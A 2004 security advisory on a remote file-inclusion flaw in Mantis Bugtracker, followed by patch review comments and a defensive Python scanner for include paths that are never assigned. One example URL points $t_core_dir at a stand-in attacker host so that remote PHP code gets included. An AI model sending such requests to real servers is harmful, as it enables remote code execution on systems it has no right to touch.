---------------------------------------------------------------------------
Mantis Bugtracker Remote PHP Code Execution Vulnerability
---------------------------------------------------------------------------

Author:   Joxean Koret
Date:     08-01-2004
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mantis Bugtracker

Mantis is a web-based bug-tracking system. It is written in the PHP
scripting language and requires the MySQL database and a web server.

---------------------------------------------------------------------------

Vulnerabilities:
~~~~~~~~~~~~~~~~

A. Remote PHP Code Execution Vulnerability

A1. If the PHP REGISTER_GLOBALS setting is enabled, an attacker can execute
    arbitrary PHP code by overwriting the global variable $t_core_dir with a
    URL of their choosing, for example:

    http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/

    The following files are vulnerable:

    bug_api.php          -> at line 22? (using variable $t_core_path)
    relationship_api.php -> line 14     (using variable $t_core_dir)

The fix:
~~~~~~~~

Both of these issues have now been fixed in CVS. There is also a patch for
the Mantis 0.19.0a version:

=====================================================================
mantis.patch

bug_api.php
@@ -19,7 +19,7 @@
  require_once( $t_core_dir . 'sponsorship_api.php' );
  # MASC RELATIONSHIP
- require_once( $t_core_path.'relationship_api.php' );
+ require_once( $t_core_dir.'relationship_api.php' );
  # MASC RELATIONSHIP

and to relationship API:

  ### Relationship API ###
+ $t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
+ require_once( $t_core_dir . 'collapse_api.php' );
  # MASC RELATIONSHIP
=====================================================================

---------------------------------------------------------------------------

Contact:
~~~~~~~~

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
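Review bot: in the bug_api.php hunk, the `-`/`+` pair swaps `$t_core_path` (which nothing in the shown context assigns) for `$t_core_dir`, which the `sponsorship_api.php` line above already uses; that only closes the overridable include if `$t_core_dir` is assigned from `__FILE__` earlier in bug_api.php rather than inherited from whichever script included it, so the hunk should include that assignment in its context (the `@@ -19,7 +19,7 @@` header promises seven lines but only five are shown) or the commit message should state where it happens.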
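Review bot: the relationship_api.php fragment has no `@@` header and no file path, so `patch` cannot apply it; it should carry a proper header for relationship_api.php (the advisory names line 14 as the affected include). The two `+` lines are the right shape: `$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;` runs before the first `require_once`, so a request-supplied `$t_core_dir` is overwritten rather than used, and the trailing `DIRECTORY_SEPARATOR` is needed because `dirname()` returns no trailing separator.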
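A defender-side check for the pattern this advisory describes, added here as an example and not part of the original advisory or of Mantis: a small Python scanner that flags include/require statements whose path variable is not assigned earlier in the same file, which is exactly the variable that register_globals lets a query-string parameter populate, and then ranks each finding by whether register_globals is on in a php.ini fragment. It generalises the two files named above to any PHP source. The PHP snippets and the php.ini lines are constructed to mimic the vulnerable and patched shapes shown in the patch; they are not Mantis source, and the function names are this example's own.

```python
import re

# Constructed PHP sample shaped like the vulnerable bug_api.php described
# in the advisory (not Mantis source): $t_core_dir is assigned from
# __FILE__, but the second include uses $t_core_path, which nothing in
# the file assigns.
VULNERABLE_SRC = """<?php
$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
require_once( $t_core_dir . 'sponsorship_api.php' );
# MASC RELATIONSHIP
require_once( $t_core_path.'relationship_api.php' );
"""

# Constructed sample shaped like the patched relationship_api.php: the
# prefix is derived from __FILE__ before any include uses it.
PATCHED_SRC = """<?php
$t_core_dir = dirname( __FILE__ ).DIRECTORY_SEPARATOR;
require_once( $t_core_dir . 'collapse_api.php' );
"""

# Constructed php.ini fragment (hypothetical values) used to decide whether
# an unassigned include variable is actually reachable from a request.
INI_SAMPLE = """; constructed php.ini fragment
register_globals = On
"""

# include/require[_once] whose first path operand is a variable.
INCLUDE_RE = re.compile(r"\b(?:require|include)(?:_once)?\s*\(?\s*\$(\w+)")
# Plain assignment to a variable (the lookahead excludes == comparisons).
ASSIGN_RE = re.compile(r"\$(\w+)\s*=(?!=)")


def find_unassigned_include_vars(src):
    """Return [(line_no, var)] for include statements whose path variable
    has no assignment on the same or an earlier line of this file."""
    assigned = set()
    findings = []
    for no, line in enumerate(src.splitlines(), start=1):
        # Record assignments first so "$x = 'a'; require $x;" on one line
        # still counts as assigned before use.
        for a in ASSIGN_RE.finditer(line):
            assigned.add(a.group(1))
        m = INCLUDE_RE.search(line)
        if m and m.group(1) not in assigned:
            findings.append((no, m.group(1)))
    return findings


def ini_flag(ini_text, name):
    """Return True/False for a boolean php.ini directive, or None when the
    directive is absent. Lines starting with ';' are comments."""
    for line in ini_text.splitlines():
        line = line.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key.lower() == name.lower():
            return value.strip('"').lower() in ("on", "1", "true", "yes")
    return None


def triage(src, ini_text):
    """Rank each finding: 'high' when register_globals is on (the include
    prefix can then come straight from the query string), else 'review'."""
    level = "high" if ini_flag(ini_text, "register_globals") else "review"
    return [(no, var, level) for no, var in find_unassigned_include_vars(src)]


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_SRC), ("patched", PATCHED_SRC)):
        print(name, triage(src, INI_SAMPLE))
```

The check is a heuristic: it only sees assignments within one file, so it over-reports when a variable is set by a previously included script, and it under-reports nothing that matters here because an include prefix that is never assigned anywhere is the case the advisory describes. The durable fix is the one the patch applies, assigning the prefix from `__FILE__` before any include uses it, with register_globals turned off in php.ini so that request parameters never become globals in the first place.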